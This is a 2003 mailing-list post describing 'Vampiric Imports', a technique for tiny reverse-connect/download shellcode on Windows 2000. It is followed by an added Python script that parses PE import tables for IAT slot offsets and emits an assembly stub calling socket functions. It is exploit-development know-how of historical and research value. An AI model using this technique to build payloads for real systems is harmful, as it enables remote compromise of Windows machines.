Tiny Windows 2000 Reverse Connect
From: H D Moore (sflist at digitaloffense.net)
Date: Mon Oct 06 2003 - 16:11:19 CDT
Most operating systems ship with a massive number of files that have not
been modified since the initial release; these files can be used to
develop really small, service-pack-independent shellcode. The trick is to
use a single LoadLibraryA call to get the module base, then call the IAT
functions directly using hardcoded offsets. The result is a
reverse-connect/download-shellcode payload that is 179 bytes and works on
every service pack of Windows 2000 :)
I managed to get a null-free version right around 200 bytes, but any
really small XOR encoder will work as well. This technique, dubbed
'Vampiric Imports', is implemented in the following code:
- http://metasploit.com/sc/win2000_vampiric_connector.asm
A tiny XOR decoder based on noir's fnstenv getpc is online at:
- http://metasploit.com/sc/x86_fnstenv_xor_byte.asm
It should be possible to build similar payloads that work with NT 4.0,
Windows XP, and Windows 2003...
-HD
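The offset-harvesting step behind the technique, as an added illustration that is not HD's code and not the payload linked above: the shellcode needs, for each function it wants, the RVA of that function's IAT slot inside a module whose on-disk bytes never change. Because the slot offset is relative to the module base, it survives relocation and rebasing; what it does not survive is a service-pack update of that file, so the practical check is to confirm the file's hash is identical across every service pack you intend to cover. The script below builds a constructed PE32 sample (not a real Windows binary) with one WS2_32.dll import descriptor, parses its import directory the way the PE loader does (PE32 and PE32+, by-name and by-ordinal entries), and renders the resulting LoadLibraryA-then-call-through-IAT sequence. The module name "sample.dll", the use of ebx as the base register and the assembly text are assumptions for illustration; the shellcode can only reach functions the chosen module itself imports, and LoadLibraryA must map the module normally (not as a data file) so the loader actually fills the slots.

```python
import struct

# Ordinal-import flag in an import lookup table entry, keyed by thunk size (PE32 / PE32+).
ORDINAL_FLAG = {4: 0x80000000, 8: 0x8000000000000000}


def build_sample_pe():
    """Constructed sample data (not a real Windows file): a minimal PE32 image
    with one section holding an import directory for WS2_32.dll."""
    sect_rva, sect_raw = 0x1000, 0x200
    imports = [("WSASocketA", 0), ("connect", 4), ("recv", 16)]   # (name, hint)
    ilt_off = 40                                   # after descriptor + null descriptor
    iat_off = ilt_off + 4 * (len(imports) + 1)     # IAT directly follows the ILT
    name_off = iat_off + 4 * (len(imports) + 1)
    dll_name = b"WS2_32.dll\0"
    hn_off = (name_off + len(dll_name) + 1) & ~1   # hint/name entries, 2-byte aligned
    hint_names, hn_rvas = b"", []
    for name, hint in imports:
        hn_rvas.append(sect_rva + hn_off + len(hint_names))
        hint_names += struct.pack("<H", hint) + name.encode() + b"\0"
        hint_names += b"\0" * (len(hint_names) % 2)
    sect = bytearray(hn_off + len(hint_names))
    struct.pack_into("<IIIII", sect, 0, sect_rva + ilt_off, 0, 0,
                     sect_rva + name_off, sect_rva + iat_off)
    for i, rva in enumerate(hn_rvas):              # on disk the IAT mirrors the ILT;
        struct.pack_into("<I", sect, ilt_off + 4 * i, rva)   # the loader overwrites
        struct.pack_into("<I", sect, iat_off + 4 * i, rva)   # IAT slots with pointers
    sect[name_off:name_off + len(dll_name)] = dll_name
    sect[hn_off:hn_off + len(hint_names)] = hint_names

    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                    # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<II", opt, 96 + 8, sect_rva, 40)         # DataDirectory[1]: imports
    sect_hdr = struct.pack("<8sIIIIIIHHI", b".rdata\0\0", len(sect), sect_rva,
                           len(sect), sect_raw, 0, 0, 0, 0, 0x40000040)
    headers = dos + b"PE\0\0" + file_hdr + opt + sect_hdr
    return bytes(headers) + b"\0" * (sect_raw - len(headers)) + bytes(sect)


def _read_cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii")


def parse_iat(data):
    """Return {(dll, symbol): iat_slot_rva} for every import of a PE32/PE32+ file.
    base + slot_rva is where the loader writes the resolved function pointer."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad NT signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    magic = struct.unpack_from("<H", data, pe + 24)[0]
    tsz, dd_off = {0x10B: (4, 96), 0x20B: (8, 112)}[magic]     # thunk size, DataDirectory offset
    import_rva = struct.unpack_from("<I", data, pe + 24 + dd_off + 8)[0]
    # (VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData) per section header
    sections = [struct.unpack_from("<IIII", data, pe + 24 + opt_size + 40 * i + 8)
                for i in range(nsec)]

    def off(rva):
        for vsize, vaddr, rawsize, raw in sections:
            if vaddr <= rva < vaddr + max(vsize, rawsize):
                return rva - vaddr + raw
        raise ValueError("RVA 0x%x not in any section" % rva)

    fmt, ordflag = ("<I", "<Q")[tsz == 8], ORDINAL_FLAG[tsz]
    slots, desc = {}, off(import_rva)
    while True:
        oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", data, desc)
        if name_rva == 0 and ft == 0:              # all-zero terminator descriptor
            break
        dll = _read_cstr(data, off(name_rva))
        lookup = oft or ft                         # some linkers omit the ILT
        for i in range(0x10000):
            entry = struct.unpack_from(fmt, data, off(lookup + i * tsz))[0]
            if entry == 0:
                break
            sym = "#%d" % (entry & 0xFFFF) if entry & ordflag else _read_cstr(data, off(entry) + 2)
            slots[(dll, sym)] = ft + i * tsz       # slot RVA = FirstThunk + index * thunk size
        desc += 20
    return slots


def vampiric_stub(module, slots, calls):
    """Illustrative assembly text (assumed register use, not HD's payload): one
    LoadLibraryA for the base, then calls through that module's IAT slots.
    Arguments to each call are assumed to have been pushed already."""
    lines = ["push offset sz_%s" % module.split(".")[0], "call [LoadLibraryA]",
             "mov ebx, eax            ; module base"]
    for dll, sym in calls:
        lines.append("call dword ptr [ebx + 0x%X]   ; %s!%s" % (slots[(dll, sym)], dll, sym))
    return lines


if __name__ == "__main__":
    slots = parse_iat(build_sample_pe())
    for (dll, sym), rva in sorted(slots.items(), key=lambda kv: kv[1]):
        print("%-12s %-12s IAT slot RVA 0x%04X" % (dll, sym, rva))
    print("\n".join(vampiric_stub("sample.dll", slots,
                                  [("WS2_32.dll", "WSASocketA"), ("WS2_32.dll", "connect"),
                                   ("WS2_32.dll", "recv")])))
```

Run against a real file, the same parse_iat gives the offsets to hardcode; the only per-target knowledge left in the payload is then the module name string and those slot RVAs, which is why the resulting shellcode is independent of where ws2_32.dll or kernel32.dll happen to load on a given service pack.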